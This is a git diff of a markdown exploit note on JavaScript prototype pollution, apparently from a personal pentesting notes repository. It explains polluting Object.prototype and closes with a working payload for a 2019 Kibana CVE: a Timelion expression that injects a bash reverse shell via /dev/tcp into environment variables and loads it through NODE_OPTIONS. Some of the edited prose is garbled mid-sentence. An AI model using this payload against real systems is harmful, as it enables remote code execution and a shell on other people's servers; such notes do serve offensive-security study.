diff --git a/Exploits/Web/Prototype Pollution JS.md b/Exploits/Web/Prototype Pollution JS.md index d12f7b7..d2e9f07 100644 --- a/Exploits/Web/Prototype Pollution JS.md +++ b/Exploits/Web/Prototype Pollution JS.md @@ -1,31 +1,43 @@ # Prototype Pollution -* Overwrite built in properties, like constructor, toString of an object. -* Any other instance inherits properties from `Object.__proto__`. toString() is inherited by all objects. +Overwrite built in properties, like constructor, toString of an object. + +Any other instance inherits properties from `Object.__proto__`. toString() is +inherited by all objects. +That means if the `toString()` functions is overwritten it is changed in all +other objects as well. + ## Usage -* Access to prototype inside object, as an example Javascript + +Access to prototype can be gained inside an object, as an example + ```javascript obj.__proto__ Object.prototype ``` -* Create object + +Create an object + ```javascript let obj = {} ``` -* Create properties inside `__proto__`. + +Create properties inside `__proto__`. + ```javascript obj.__proto__.isAdmin = true ``` -### Start Node commands -* Use - * `require` - * `eval` - ### Kibana CVE 2019 -* Write reverse bash into variable + +A concrete example is a Kibana prototype pollution from CVE from 2019. Write +reverse bash into variables so they get +Therefore Use the following node functions + +* `require` +* `eval` + ```javascript .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i >& /dev/tcp//4444 0>&1\'");//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ') ``` -